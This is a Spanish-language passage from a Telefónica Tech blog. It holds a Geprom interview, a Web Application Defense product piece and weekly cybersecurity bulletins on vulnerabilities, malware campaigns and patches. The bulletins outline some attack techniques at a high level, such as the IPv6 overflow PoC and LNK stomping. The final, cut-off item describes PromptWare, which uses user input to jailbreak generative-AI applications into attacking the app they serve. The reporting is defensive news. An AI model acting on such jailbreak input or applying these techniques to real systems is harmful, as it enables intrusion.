de los casos más destacados es la digitalización global de las operaciones de Stolt, dedicada a la acuicultura terrestre. Para asegurar el éxito del proyecto y alcanzar los objetivos del cliente, ha sido clave la propuesta de valor conjunta entre automatización y digitalización de procesos. Como también las capacidades de integración de analítica avanzada e Inteligencia Artificial que nos permiten anticipar la demanda y la oferta del producto a cinco años vista. Destacaría, además, el enorme valor que aporta este binomio en la implementación de una solución integral de Ciberseguridad y automatización industrial. Sin entrar en detalles específicos de clientes, podemos decir que combinamos nuestras soluciones de automatización con las capacidades avanzadas en conectividad gestionada y Ciberseguridad de Telefónica Tech. Esto ha permitido a nuestros clientes no solo optimizar sus procesos productivos, sino también conectar y proteger sus infraestructuras críticas contra ciberamenazas, asegurando así una operación continua y segura. ¿Cómo ves la situación actual de la industria a nivel global y cuáles consideras que son los mayores retos y tendencias? A nivel global la industria está en una fase de transformación digital acelerada, impulsada por la necesidad de eficiencia, flexibilidad y sostenibilidad. Los mayores retos incluyen la gestión de datos masivos, la Ciberseguridad y la integración de tecnologías emergentes en un muy corto plazo de tiempo. Las tendencias emergentes abarcan desde la automatización avanzada y la robótica hasta la inteligencia artificial y el IoT industrial, sin olvidar la ciberseguridad OT. Geprom se está posicionando para enfrentar estos desafíos y aprovechar las nuevas tendencias mediante la inversión en I+D, la formación continua de nuestro equipo y la adopción de las capacidades de Telefónica Tech. En el ámbito de la industria, ¿qué importancia tienen el dato y la IA? ¿Puedes compartir alguna innovación reciente que haya sido posible gracias al análisis de datos? En la industria actual los datos y la inteligencia artificial son fundamentales. Tanto es así que el dato ha pasado a ser uno de los activos más importantes de las empresas. Ya no producen solo sus productos, sino que todas ellas producen también los datos que emergen de sus procesos productivos. Cómo traten y gestionen esos datos permitirá a las compañías diferenciarse de sus competidores. Un ejemplo de todo ello es la integración de la Inteligencia Artificial en los procesos productivos, algo que permite tomar decisiones más informadas, predecir fallos o averías e incluso autogestionar y optimizar los procesos en tiempo real, de manera autónoma. Tenemos un ambicioso plan de crecimiento basado en la expansión nacional e internacional aprovechando la fuerza comercial y la presencia de Grupo Telefónica en diferentes mercados. ¿Qué previsiones manejáis para el futuro de la industria y qué planes tenéis para seguir creciendo? Anticipamos que la industria continuará su avance hacia una mayor digitalización y conectividad a un ritmo frenético. La demanda de soluciones de automatización, digitalización, análisis de datos y Ciberseguridad seguirá al alza en el sector industrial. Nuestros planes de crecimiento incluyen continuar con nuestra expansión nacional para reforzar nuestras capacidades para la industria española, y la expansión internacional para abordar mercados donde el Grupo tiene presencia. También estamos trabajando en el desarrollo de nuevas capacidades basadas en Inteligencia Artificial y en la consolidación de nuestras capacidades en conectividad OT y Ciberseguridad industrial para reforzar nuestra propuesta de valor global. Vamos a seguir comprometidos con la innovación para ofrecer soluciones que ayuden a nuestros clientes a ser más competitivos y resilientes en un entorno industrial en constante evolución.
17 de septiembre de 2024
Boletín de Ciberseguridad, 7 - 13 septiembre
Fortinet, víctima de ciberataque La compañía Fortinet emitió un comunicado en el que señala haber sido víctima de un ciberataque que habría ocasionado la exfiltración de datos de la compañía. En concreto, los hechos han tenido lugar recientemente cuando un actor malicioso denominado Fortibitch ha publicado en un conocido foro clandestino que habría conseguido sustraer 440gb de archivos pertenecientes a la compañía Fortinet, a la cual habría intentado extorsionar con el fin de pagar un rescate. El medio digital BleepingComputer ha contactado con Fortinet, quienes han señalado que un atacante ha tenido un acceso no autorizado a una cantidad limitada de archivos almacenados en una instancia de Fortinet alojada en la nube de terceros. Asimismo, en el comunicado de la compañía, señalan que el incidente afectó a menos del 0,3% de sus clientes, a quienes ya se habrían puesto en contacto para informarles sobre la situación, y que no ha resultado en ninguna actividad maliciosa dirigida contra los mismos. Más info Microsoft corrige 79 vulnerabilidades en el Patch Tuesday de septiembre Microsoft ha lanzado su Patch Tuesday correspondiente al mes de septiembre de 2024 en el que ha corregido un total de 79 vulnerabilidades, incluidas cuatro 0-days explotadas activamente. Entre las más críticas destaca CVE-2024-43491, CVSSv3 9.8 según fabricante, fallo que permite la ejecución remota de código a través de Windows Update. CVE-2024-38014, CVSSv3 7.8 según fabricante, se trata de vulnerabilidad de elevación de privilegios en Windows Installer. Los otros dos 0-days parcheados son fallos de elusión de las funciones de seguridad de Windows Mark of the Web (MoTW) y en Microsoft Publisher, CVE-2024-38217 y CVE-2024-38226 CVSSv3 5.4 y 7.3 respectivamente según el fabricante. En cuanto al resto de vulnerabilidades corregidas 29 son de elevación de privilegios, 22 permiten la ejecución remota de código, 11 producen divulgación de información, 8 denegación de servicio, 3 suplantación de identidad y otras 2 permiten eludir funciones de seguridad. ✅ Dado el riesgo que representan, Microsoft recomienda priorizar la aplicación de los parches para mitigar posibles ataques. Más info Vulnerabilidad crítica en Apache La compañía Apache ha corregido una vulnerabilidad crítica en OFBiz, el cual es un conjunto de aplicaciones empresariales de gestión de relaciones de CRM y ERP. En concreto, dicho fallo de seguridad ha sido descubierto por investigadores de seguridad de Rapid7, al cual se ha identificado como CVE-2024-45195, CVSSv3 de 7.5. Según los investigadores, un atacante sin credenciales válidas podría aprovechar las comprobaciones de autorización de visualización faltantes en la aplicación web para ejecutar código arbitrario tanto en servidores Linux como Windows vulnerables. Debido a estos hechos, el equipo de seguridad de Apache solucionó la vulnerabilidad en la versión 18.12.16 añadiendo comprobaciones de autorización. Asimismo, desde Rapid7 han hecho pública una prueba de concepto sobre este fallo de seguridad. Más info Atomic es el stealer con mayor impacto en sistemas macOS El equipo de investigadores de Sophos ha publicado una investigación en la que informan sobre el crecimiento de software malicioso en sistemas operativos macOS. En concreto, los expertos señalan que en su telemetría muestra como la familia de infostealers Atomic macOS Stealer (AMOS) es de las más comunes. Dicho malware tiene como función el robo de datos confidenciales como cookies, contraseñas, datos de autocompletado y billeteras de criptomonedas. AMOS se encuentra accesible en canales de Telegram a un precio de 3 000$ y principalmente su vector de entrada es mediante malversiting y técnicas de envenenamiento al SEO. Cabe indicar que, AMOS se ha visto suplantando herramientas legitimas con el objetivo de engañar a sus víctimas para descargar su ejecutable, siendo algunas de estas como Trello, Notion, Slack, entre otras. En cuanto a su desarrollo, los investigadores señalan que continúan realizando mejoras, como el ejemplo de que se ha anunciado una futura versión dirigida contra usuarios de iPhone. Más info SonicWall alerta de la explotación de una vulnerabilidad crítica SonicWall ha informado de que la vulnerabilidad CVE-2024-40766, CVSSv3 9.3 según proveedor, estaría siendo potencialmente explotada activamente. El fallo, que habría sido parcheado el 22 de agosto de 2024, permitiría a un atacante obtener acceso no autorizado a recursos y eliminar protecciones de la red, incluyendo la capacidad de bloquear cortafuegos. Aunque inicialmente se creía que esta vulnerabilidad afectaba al acceso de SonicWall SonicOS, concretamente a los productos SonicWall Firewall Gen 5, Gen 6 y Gen 7, el último aviso de seguridad publicado por la empresa afirmaría que CVE-2024-40766 también afecta a la función SSLVPN de los firewall. ✅ Aunque se desconocen los detalles de la presunta explotación de dicho fallo, SonicWall ha publicado una lista de mitigaciones de seguridad recomendadas, entre las que se incluirían restringir o desactivar el acceso a SSLVPN, actualizar las contraseñas de los dispositivos Gen 5 y Gen 6, y habilitar la autenticación multifactor (MFA). Más info ◾ Este boletín es uno de los entregables de nuestro servicio Operational and Strategic Intelligence. Si deseas conocer el resto de los contenidos de inteligencia operativa y estratégica incluidos en el servicio contacta con nosotros →
13 de septiembre de 2024
Simplifica la protección de aplicaciones: cómo Telefónica Tech WAD asegura tu negocio
Las aplicaciones empresariales están constantemente en el punto de mira de los ciberdelincuentes que buscan dañar ingresos y reputaciones. Sin embargo, las organizaciones siguen luchando para proteger sus servicios digitales frente a una nueva ola de amenazas. Las empresas necesitan hoy soluciones sencillas que eliminen los silos de aplicaciones, reduzcan la carga sobre los recursos internos y se mantengan al ritmo de las ciberamenazas más sofisticadas. Con Web Application Defense (WAD) de Telefónica Tech puedes consolidar la protección de las aplicaciones y las API en un único servicio gestionado, mejorando la seguridad inigualable, simplificando y ahorrando. Las nuevas complejidades de las aplicaciones Los entornos de aplicaciones han cambiado radicalmente. Ya sea en el centro de datos, en múltiples nubes o en despliegues Edge, las aplicaciones modernas están distribuidas en una multitud de ubicaciones y se mantienen en constante evolución. Sin embargo, las empresas a menudo carecen de los recursos necesarios para gestionar y asegurar su creciente cantidad de aplicaciones. Una protección adecuada requiere talento, experiencia y tiempo dedicado para cada entorno específico. También necesita la capacidad de adaptarse a las necesidades del negocio cuando se lanzan rápidamente nuevos servicios en la nube o se traen de vuelta a instalaciones locales. No mantener el ritmo puede tener consecuencias graves, como medidas de seguridad a medias, áreas de exposición o, peor aún, aplicaciones completamente desprotegidas. Una protección adecuada requiere talento, experiencia en el sector y tiempo dedicado a cada entorno a medida. Las herramientas comunes no son suficiente Mantener una postura de seguridad fuerte es cada vez más desafiante. Las empresas necesitan soluciones efectivas que cubran todas sus necesidades de seguridad, independientemente de dónde residan las aplicaciones. Sin embargo, las herramientas existentes dejan mucho que desear. Las defensas perimetrales que funcionan bien en el centro de datos no escalan en la nube, las herramientas nativas de la nube no son aplicables fuera de los entornos propietarios, y los productos de nicho introducen brechas y puntos ciegos críticos. Incluso para las organizaciones más maduras en seguridad, este enfoque dispar puede agotar a los equipos de TI, crear estándares de seguridad inconsistentes en diferentes entornos y poner en riesgo la protección de las aplicaciones y el cumplimiento de las normas del sector. Perfiles de riesgo en aumento Los actores malintencionados están innovando constantemente, empleando tácticas avanzadas para comprometer aplicaciones y datos críticos. A pesar de la inversión significativa, la mayoría de las defensas siguen siendo demasiado estáticas o lentas para ser efectivas, lo que las hace ineficaces contra las amenazas sofisticadas que se reestructuran rápidamente para eludir las medidas de seguridad existentes. Esto hace que sea cada vez más difícil para las empresas defenderse contra nuevas olas de ciberataques furtivos, automatizados y basados en IA. Proteger las aplicaciones de los exploits modernos requiere una seguridad integral y consistente que mitigue las amenazas de nueva generación, tanto hoy como mañana. Esto también incluye asegurar las capas crecientes de API, que son un componente central de las arquitecturas de aplicaciones modernas y se han convertido en objetivos principales de los ciberataques. Proteger las aplicaciones de los ataques modernos requiere una seguridad integral y consistente que mitigue las amenazas de nueva generación, tanto hoy como mañana. Nuestra propuesta Telefónica Tech WAD Existe una forma mejor de proteger aplicaciones y datos, y además acompañado. Web Application Defense (WAD) de Telefónica Tech es un servicio gestionado de protección de las aplicaciones web y las API (WAAP) diseñado específicamente para simplificar la seguridad, mitigar ataques y garantizar la disponibilidad y el rendimiento de los servicios críticos. Como parte de nuestro portafolio de servicios NextDefense y respaldado por las tecnologías de F5, WAD permite a las organizaciones de todos los tamaños consolidar la seguridad a través de aplicaciones distribuidas, API y entornos. Con configuraciones basadas en políticas, firewall de aplicaciones web (WAF) escalable, análisis de comportamiento asistido por IA y seguridad API integrada, WAD ha demostrado proteger a las empresas contra los Top 10 de OWASP, DDoS, bots maliciosos y ataques de día cero. Y dado que todo se gestiona desde una plataforma moderna SaaS y cuenta con el respaldo de nuestra red de SOC 24x7 de Telefónica Tech, WAD ofrece defensas confiables que no aumentan tu pila tecnológica ni consumen recursos internos; no se requiere experiencia dedicada, hardware ni cambios en el código. Ahora puedes asegurar tus cargas de trabajo con confianza, cerrar brechas críticas y escalar fácilmente la seguridad para satisfacer las necesidades actuales y futuras de las aplicaciones. ✅ ¿Estás preparado para estandarizar la protección de tus aplicaciones con un único proveedor de servicios gestionados? Descarga la infografía para saber más o Contáctanos → ____ Cloud Business Applications: qué son y cómo ayudan a tu empresa 17 de julio de 2024
10 de septiembre de 2024
Boletín de Ciberseguridad, 1 - 6 septiembre
Actores norcoreanos explotan en sus operaciones 0-day en Chrome El equipo de investigadores de Microsoft ha publicado una investigación en la que señala que el grupo malicioso norcoreano denominado Citrine Sleet, o también conocido como AppleJeus, UNC4736 o Hidden Cobra, estaría explotando en sus operaciones un fallo de seguridad en Chrome. En concreto, dicha vulnerabilidad se trataría de la 0-day registrada como CVE-2024-7971, CVSSv3 de 8.8, que se debe a una debilidad por confusión de tipos en el motor de JavaScript V8 de Chrome, permitiendo una ejecución de código remoto. Dicha vulnerabilidad fue parcheada la pasada semana, aunque el indicado grupo norcoreano estaría apuntando contra instituciones financieras, centrándose en organizaciones de criptomonedas e individuos asociados, con el fin de conseguir un beneficio económico mediante la explotación del fallo de seguridad y con el objetivo de distribuir el rootkit FudModule después de obtener privilegios de SISTEMA en los dispositivos afectados. Más info Detectada una vulnerabilidad crítica en routers TP-Link Recientemente fue identificada una vulnerabilidad crítica en los routers TP-Link RE365 V1_180213, que los expone a ser explotados de forma remota y potencialmente permite su control total. La vulnerabilidad, identificada como CVE-2024-42815 y con una puntuación CVSSv3 de 9.8 según la CISA, surge de un desbordamiento de búfer en el servidor HTTP del router, causado por la falta de verificación en la longitud de la cabecera "User-Agent" en solicitudes HTTP GET. Esto permite que atacantes envíen solicitudes especialmente diseñadas, provocando el bloqueo del dispositivo o una ejecución de código malicioso. Asimismo, la explotación de esta vulnerabilidad podría llevar a la denegación de servicio o al control completo del router y la red. ✅ TP-Link ha lanzado un parche para mitigar el riesgo. Por lo tanto, se recomienda encarecidamente a los usuarios que actualicen el firmware lo antes posible. Más info Zyxel corrige vulnerabilidad crítica en puntos de acceso y routers empresariales Zyxel ha emitido parches de seguridad para corregir una vulnerabilidad crítica en varios de sus routers empresariales y puntos de acceso (AP), que podría permitir a atacantes no autenticados inyectar comandos en el sistema operativo mediante el envío de una cookie manipulada a un dispositivo vulnerable. El fallo, identificado como CVE-2024-7261 y con una puntuación CVSSv3 de 9.8 según fabricante, se debe a una incorrecta neutralización de elementos especiales en el parámetro “host” del programa CGI de algunas versiones de puntos de acceso y routers. ✅ Los modelos afectados incluyen las series NWA, WAC, WAX y WBE, que requieren parches específicos para corregir la vulnerabilidad, por lo que se recomienda aplicarlos a la mayor brevedad posible. Zyxel también señala que el router USG LITE 60AX no requiere ninguna acción ya que se actualiza automáticamente. Más info Vulnerabilidades críticas en productos de Veeam La compañía Veeam ha lanzado parches de seguridad para corregir hasta un total de 18 vulnerabilidades de gravedad alta y crítica que afectan a varios de sus productos como Veeam Backup & Replication, Service Provider Console y One. En concreto, de entre las vulnerabilidades 5 son consideradas críticas, siendo la más destacada la registrada como CVE-2024-40711, CVSSv3 de 9.8, que afecta a VBR y la cual un actor malicioso sin autenticación podría explotarla para realizar ejecución de código remoto. Las otras cuatro vulnerabilidades críticas han sido clasificadas como CVE-2024-42024, CVSSv3 de 9.1, CVE-2024-42019, CVSSv3 de 9.0, CVE-2024-38650, CVSSv3 de 9.9 y CVE-2024-39714, CVSSv3 de 9.9 que afectan a las versiones 8.1.0.21377 y anteriores de Service Provider Console y a las versiones 12.1.0.3208 y anteriores de los productos ONE. ✅ Desde Veeam recomiendan a sus usuarios actualizar sus activos Veeam ONE a la versión 12.2.0.4093 y Veeam Service Provider Console a la versión 8.1.0.21377 para corregir los problemas. Más info Actores maliciosos utilizan MacroPack para distribuir malware Cisco Talos descubrió que varios actores maliciosos están usando la herramienta de generación de macros MacroPack, originalmente diseñada para equipos de Red Team, para desplegar cargas útiles como Brute Ratel, Havoc y una nueva variante del troyano de acceso remoto (RAT) PhantomCore. Según se indica, los investigadores observaron varios documentos relacionados de Microsoft Office subidos a VirusTotal entre mayo y julio de 2024 que fueron generados con MacroPack. Estos documentos maliciosos, subidos desde diferentes fuentes y países, incluyendo China, Pakistán, Rusia y los EE. UU., comparten conexiones entre las cargas útiles mencionadas y utilizan técnicas avanzadas de evasión y ofuscación, dificultando su detección. Sin embargo, a pesar de las similitudes en las tácticas, técnicas y procedimientos (TTP), no se ha podido atribuir las actividades a un solo actor de amenazas. Más info ◾ Este boletín es uno de los entregables de nuestro servicio Operational and Strategic Intelligence. Si deseas conocer el resto de los contenidos de inteligencia operativa y estratégica incluidos en el servicio contacta con nosotros → ____ Ciberseguridad La importancia de la Detección y Respuesta de Amenazas en el ámbito de la identidad 16 de julio de 2024
6 de septiembre de 2024
Boletín de Ciberseguridad, 24 - 30 agosto
APT29 reutiliza exploits de NSO Group e Intellexa en ataques a iOS y Chrome El Grupo de Análisis de Amenazas (TAG) de Google descubrió que los actores maliciosos detrás de APT29 llevaron a cabo múltiples campañas de explotación utilizando vulnerabilidades en iOS y Chrome desde noviembre de 2023 hasta julio de 2024. Estas campañas, que afectaron a dispositivos no actualizados, aprovecharon exploits desarrollados y utilizados previamente por las empresas de spyware Intellexa y NSO Group. Según se indica, los ataques comprometieron sitios web mediante tácticas de watering hole, utilizando exploits que originalmente fueron 0-days para obtener información sensible, como cookies de autenticación. Google publicó detalles técnicos sobre estas campañas, señalando que desconoce cómo APT29 obtuvo estos exploits, pero destaca su similitud en los marcos de explotación y carga útil con los de NSO e Intellexa, sugiriendo un posible intercambio de herramientas. Además, Google subraya la necesidad de abordar rápidamente las vulnerabilidades, ya que, aunque ya habían sido corregidas, los ataques continuaron siendo efectivos en dispositivos sin parches. Más info Hitachi Energy parchea 5 vulnerabilidades en MicroSCADA, 2 críticas Hitachi Energy ha publicado un aviso de seguridad alertando de 5 nuevas vulnerabilidades que afectarían a los sistemas MicroSCADA. Entre los fallos parcheados destacan CVE-2024-4872 y CVE-2024-3980, ambos con CVSSv3 9.9 según proveedor. Mientras que la primera permitiría a los atacantes llevar a cabo ataques de inyección SQL debido a la incapacidad del producto para validar correctamente las consultas de los usuarios, la segunda sería un fallo de inyección de argumentos que los atacantes podrían aprovechar para acceder o modificar archivos del sistema y otros archivos críticos de la aplicación en los sistemas afectados. Con respecto a las otras 3 vulnerabilidades, estas serían CVE-2024-3982, CVSSv3 8.2 según proveedor, CVE-2024-7940, CVSSv3 8.3 según proveedor y CVE-2024-7941, con CVSSv3 4.3 según Hitachi. En concreto, estas permitirían a un atacante secuestrar una sesión ya establecida, exponer un servicio en la red sin autenticación y redirigir a los usuarios a URL maliciosas. Hitachi Energy alienta a sus usuarios a actualizar a la versión 10.6 lo antes posible. Más info Publicado un exploit de prueba de concepto para vulnerabilidad RCE en Windows Recientemente fue publicado un código de prueba de concepto (PoC) en GitHub para la vulnerabilidad de ejecución remota de código en la pila TCP/IP de Windows, afectando a sistemas con IPv6 activado. Identificada como CVE-2024-38063 y con un CVSSv3 de 9.8 según Microsoft, permite a atacantes explotar sistemas Windows 10, 11 y Server sin necesidad de interacción del usuario, mediante el envío de paquetes IPv6 especialmente diseñados que desencadenan un desbordamiento de búfer. En cuanto a la PoC, publicada por el investigador Ynwarcs, describe cómo se puede aprovechar el fallo a través de una secuencia de pasos cuidadosamente orquestados, que implican la manipulación de desplazamientos de paquetes y campos de cabecera para provocar un comportamiento inesperado durante el reensamblado de paquetes. Según indica el investigador, la clave para explotar CVE-2024-38063 reside en activar un tiempo de espera en el proceso de reensamblaje de paquetes IPv6, lo que conduce a un desbordamiento de enteros y el posterior desbordamiento de búfer. Más info Google parchea nueva 0-day activamente explotada La compañía Google ha lanzado una nueva actualización para corregir una vulnerabilidad 0-day activamente explotada. En concreto, el fallo de seguridad ha sido registrado como CVE-2024-7965, CVSSv3 de 8.8, y se debe a una implementación inapropiada en el motor JavaScript V8 de Google Chrome que puede permitir a atacantes remotos explotar la heap corruption a través de una página HTML especialmente diseñada. Cabe indicar que esta vulnerabilidad fue publicada la pasada semana, pero no ha sido hasta el día de ayer, 26 de agosto, cuando Google ha actualizado el aviso de seguridad señalando esta nueva información. En base a estos hechos, se recomienda actualizar el navegador a la versión 128.0.6613.84/.85 de Chrome para sistemas Windows/macOS y a la versión 128.0.6613.84 para usuarios de Linux. Más info El grupo iraní APT33 emplea el malware Tickler en nuevas campañas Investigadores de Microsoft han detectado que el grupo de amenaza persistente avanzada (APT) iraní conocido como APT33 ha empleado un nuevo malware de puerta trasera, denominado Tickler, para acceder a redes de organizaciones de los sectores gubernamental, espacial, de defensa, educativo, petróleo y gas de Emiratos Árabes Unidos y Estados Unidos. Tickler fue utilizado como parte de una campaña de recopilación de inteligencia entre abril y julio de 2024 vinculada al actor de amenazas, asociado a su vez al Cuerpo de la Guardia Revolucionaria Islámica de Irán (IRGC). El grupo empleó inicialmente cuentas de usuario comprometidas, sobre todo, en el sector educativo para obtener su infraestructura operativa, accediendo a suscripciones existentes de Azure o creándolas, utilizando las cuentas comprometidas, con la finalidad de usar la infraestructura de Microsoft Azure para el comando y control (C2). Dicha infraestructura se utilizó en operaciones posteriores dirigidas a los demás sectores señalados. Más info ◾ Este boletín es uno de los entregables de nuestro servicio Operational and Strategic Intelligence. Si deseas conocer el resto de los contenidos de inteligencia operativa y estratégica incluidos en el servicio contacta con nosotros →
30 de agosto de 2024
Boletín de Ciberseguridad, 17 - 23 agosto
Chrome 128 corrige 38 vulnerabilidades, entre ellas una 0-day Google lanzó recientemente la versión 128 de Chrome, la cual corrige 38 vulnerabilidades, destacando una para la que ya existe un exploit en circulación. Esta falla, identificada como CVE-2024-7971, se debe a una confusión de tipos en el motor V8 de JavaScript y WebAssembly, permitiendo a un atacante remoto explotar una corrupción de la memoria heap mediante una página HTML manipulada. Otros problemas críticos corregidos incluyen una vulnerabilidad de uso después de la liberación en la función de Contraseñas (CVE-2024-7964), un fallo de implementación en V8 (CVE-2024-7965) y un problema de acceso a memoria fuera de los límites en Skia (CVE-2024-7966). Además, se han solucionado varias vulnerabilidades de gravedad media y baja en componentes como PDFium, Permisos, FedCM y el instalador de Chrome. ✅ Se recomienda a los usuarios actualizar a la versión 128.0.6613.84/.85 para Windows y macOS, y a la versión 128.0.6613.84 para Linux para mitigar posibles amenazas. Asimismo, se insta a los usuarios de navegadores basados en Chromium a aplicar las correcciones tan pronto como estén disponibles. Google mantendrá restringidos los detalles sobre la vulnerabilidad con exploit activo hasta que la mayoría de los usuarios hayan instalado las actualizaciones. Más info SolarWinds corrige vulnerabilidad crítica en Web Help Desk SolarWinds lanzó parches de seguridad para corregir una vulnerabilidad crítica en su software Web Help Desk (WHD), que podría permitir a atacantes remotos no autenticados obtener acceso no autorizado a instancias susceptibles. La vulnerabilidad, identificada como CVE-2024-28987 y con una puntuación CVSSv3 de 9.1 según fabricante, consiste en un fallo de credenciales codificadas que permite a usuarios remotos no autenticados acceder a funcionalidades internas y modificar datos. SolarWinds no ha confirmado si este fallo, corregido en la versión 12.8.3, ha sido explotado en la naturaleza. Sin embargo, indica que la actualización debe ejecutarse manualmente. Por otro lado, los parches emitidos también incluyen correcciones para otra vulnerabilidad crítica de ejecución remota de código, identificada como CVE-2024-28986 y con un CVSSv3 de 9.8 según fabricante. Esta vulnerabilidad ya había sido abordada anteriormente, pero en esta nueva versión se incluyen todas las correcciones para este fallo, el cual la CISA ha añadido a su catálogo de vulnerabilidades explotadas conocidas. Más info Cthulhu Stealer: nuevo malware contra dispositivos macOS Los investigadores de Cado Security han publicado un análisis de Cthulhu Stealer, un nuevo Malware-as-a-Service dirigido contra dispositivos macOS y ofertado por 500 dólares al mes en foros de cibercrimen. Programado en GoLang, este malware es una imagen de disco de Apple (DMG) que se hace pasar por una aplicación legítima y que requiere la interacción del usuario para poder ejecutarse. Concretamente, el malware solicita a la víctima su contraseña del dispositivo y de la billetera de criptomonedas Metamask, tras lo cual obtiene información del dispositivo infectado, incluyendo su IP y la versión del sistema operativo. Finalmente, Cthulhu Stealer roba credenciales de buscadores, criptomonedas y cuentas de videojuegos. Los investigadores destacan que el malware no parece especialmente sofisticado, ya que no dispone de ninguna técnica de evasión de la detección. Asimismo, Cthulhu Stealer presenta un alto grado de similitud con Atomic Stealer, compartiendo incluso las mismas erratas en el código. Más info Microsoft retomará Windows Recall Después de que Microsoft anunciase el 7 de junio la decisión de desactivar por defecto la función Windows Recall en los PC Copilot+, el 21 de agosto se ha sabido que una versión revisada de Recall estará disponible en octubre para los afiliados del programa Windows Insiders. Recall es una función que almacena capturas de pantalla de todo lo que el usuario ve, lo que generó muchas críticas por posibles problemas de seguridad. Más info Log4Shell sigue siendo explotada dos años después Dos años después de su descubrimiento, la vulnerabilidad Log4Shell (CVE-2021-44228, CVSSv3 10) sigue siendo explotada por ciberdelincuentes para desplegar malware en sistemas vulnerables. Investigadores de Datadog descubrieron una campaña en la que los atacantes utilizaban solicitudes LDAP ofuscadas para abusar de Log4Shell y lograr la implementación de XMRig, un minero de criptomonedas. Más info ◾ Este boletín es uno de los entregables de nuestro servicio Operational and Strategic Intelligence. Si deseas conocer el resto de los contenidos de inteligencia operativa y estratégica incluidos en el servicio contacta con nosotros →
23 de agosto de 2024
Boletín de Ciberseguridad, 10 - 16 agosto
SinkClose: vulnerabilidad que permite instalar malware en procesadores de AMD AMD ha emitido una advertencia sobre una vulnerabilidad de alta gravedad llamada SinkClose, que afecta a sus procesadores EPYC, Ryzen y Threadripper y que permitiría que un atacante con acceso a nivel del kernel (Ring 0) eleven privilegios a Ring -2. Aunque Sinkclose requiere acceso a nivel de kernel para ser explotada, no es poco habitual que este tipo vulnerabilidades sean usados por actores sofisticados dado que los privilegios de Ring -2 son los que supervisan funciones críticas del sistema como la gestión de energía y la seguridad y posibilitarían, por ejemplo, la instalación de malware casi indetectable. En cualquier caso, la vulnerabilidad ha sido identificada como CVE-2023-31315 con un CVSS de 7.5 y fue descubierta por los investigadores de IOActive, habiéndose presentado en una charla de DEFCON titulada "AMD SinkClose: Universal Ring-2 Privilege Escalation". AMD ya ha lanzado mitigaciones para los procesadores EPYC y Ryzen, esperándose más parches para otros procesadores próximamente. Más info Incautados los servidores del grupo de ransomware Dispossessor El FBI ha anunciado la incautación de los servidores y sitios web empleados por el grupo de ransomware Dispossessor, también conocido como Radar. La operación habría sido llevada a cabo conjuntamente con otras agencias de seguridad, incluyendo la Agencia Nacional contra la Delincuencia del Reino Unido y la Oficina Estatal de Policía Criminal de Baviera (BLKA). Este grupo de ransomware estaría liderado por un individuo conocido como Brain y habría atacado a más de 40 víctimas desde agosto de 2023, afectando a entidades de diversos países, entre ellos Estados Unidos, Argentina, Honduras, India, Canadá, Croacia y Emiratos Árabes Unidos. De acuerdo con la publicación del FBI, en sus ataques el grupo obtendría acceso inicial a través de la explotación de vulnerabilidades, así como de cuentas con contraseñas débiles y sin doble factor de autenticación. Asimismo, el grupo destaca por la republicación de filtraciones de Lockbit3, afirmando que serían uno de sus afiliados. Más info Vulnerabilidad crítica en SolarWinds Recientemente ha sido publicado un aviso de seguridad en donde se informe sobre una vulnerabilidad crítica en la solución Web Help Desk de SolarWinds. En concreto, el fallo de seguridad ha sido registrado como CVE-2024-28986, CVSSv3 de 9.8 según fabricante, y se debe a una deserialización de Java que permitiría a un atacante ejecutar comandos en un sistema vulnerable. Según SolarWinds, dicha vulnerabilidad se reportó indicando que podría ser aprovechada sin autenticación, sin embargo, el equipo interno de la compañía concluyó que solo se puede realizar requiriendo previamente autenticación. Cabe indicar que el fallo afecta a todas las versiones de SolarWinds Web Help Desk, excepto la última, 12.8.3, por lo que recomiendan a sus usuarios actualizar el activo para corregir el falo de seguridad. Más info Head Mare explota vulnerabilidad en WinRAR para desplegar ransomware El grupo hacktivista Head Mare apunta, según Kaspersky, a organizaciones rusas y bielorrusas utilizando campañas de phishing con archivos de WinRAR que explotan la vulnerabilidad CVE-2023-38831 como mecanismo de acceso inicial. Este grupo desplegaría como represalia muestras de ransomware como LockBit y Babuk para cifrar sistemas y exponer datos robados. A diferencia de otros hacktivistas anti-rusos, Head Mare utiliza métodos avanzados vinculados a muestras de malware conocidas como PhantomDL y PhantomCore así como herramientas públicas como Mimikatz y XenAllPasswordPro para la recuperación de credenciales. Sus tácticas también incluyen el enmascaramiento de aplicaciones sospechosas como software legítimo, el uso de servidores VPS para desplegar el C2 Sliver, además de otras herramientas como scripts de PowerShell, Meterpreter para la interacción remota y diferentes tipos de webshells en PHP para asegurar la persistencia. Más info ◾ Este boletín es uno de los entregables de nuestro servicio Operational and Strategic Intelligence. Si deseas conocer el resto de los contenidos de inteligencia operativa y estratégica incluidos en el servicio contacta con nosotros →
16 de agosto de 2024
Boletín de Ciberseguridad, 3-9 agosto
Vulnerabilidad 0-day explotada activamente en el kernel de Android Google ha lanzado parches de seguridad en Android para corregir hasta un total de 46 vulnerabilidades, de entre las cuales destaca un 0-day explotado activamente. En concreto, dicho fallo de seguridad ha sido registrado como CVE-2024-36971, CVSSv3 de 7.8, y es de uso posterior a la liberación (UAF) en la gestión de rutas de red del núcleo de Linux y cabe indicar que, para ser explotada, se requiere privilegios de ejecución del sistema. Según investigadores de Google, dicha vulnerabilidad estaría siendo explotada de forma limitada y dirigida con el objetivo de realizar una ejecución de código arbitrario sin interacción del usuario en dispositivos vulnerables. En último lugar, destaca que Google aún no ha brindado detalles sobre cómo se está explotando la falla, ni tampoco qué actor de amenazas estaría detrás de los ataques ocurridos. Más info Fallo en Windows Smart App Control y SmartScreen explotado desde 2018 Investigadores de Elastic Security Labs han descubierto un fallo de diseño en las aplicaciones Windows Smart App Control y SmartScreen, el cual estaría siendo explotado desde, al menos, el año 2018. Esta vulnerabilidad permite a los atacantes lanzar programas mediante el manejo de archivos LNK (técnica denominada LNK stomping) sin ser detectado por los controles de seguridad diseñados para bloquear aplicaciones sospechosas. Para ello, un actor malicioso puede crear ficheros LNK con rutas de destino o estructuras internas no estándar. Cuando el usuario accede al enlace o fichero en cuestión, el Explorador de Windows busca e identifica el nombre .exe coincidente, corrigiendo la ruta completa para utilizar el formato canónico correcto. Sin embargo, esto también elimina la etiqueta MotW (Mark of the Web) utilizada para las comprobaciones de seguridad, actualizando el archivo en el disco e iniciando el ejecutable. Más info PromptWare: nueva técnica de ataque contra IA generativa Los investigadores Stav Cohen, Ron Bitton y Ben Nassi han publicado un artículo en el que detallan como las aplicaciones impulsadas por inteligencia artificial generativa (Gen-AI) son vulnerables a PromptWares. En concreto, en los ataques PromptWare la Gen-AI es manipulada mediante las entradas del usuario para conseguir jailbreaks y conseguir que, en vez de servir a la aplicación en la que está integrada, pase a atacarla. Los investigadores comparan la implementación de PromptWare con un malware polimórfico 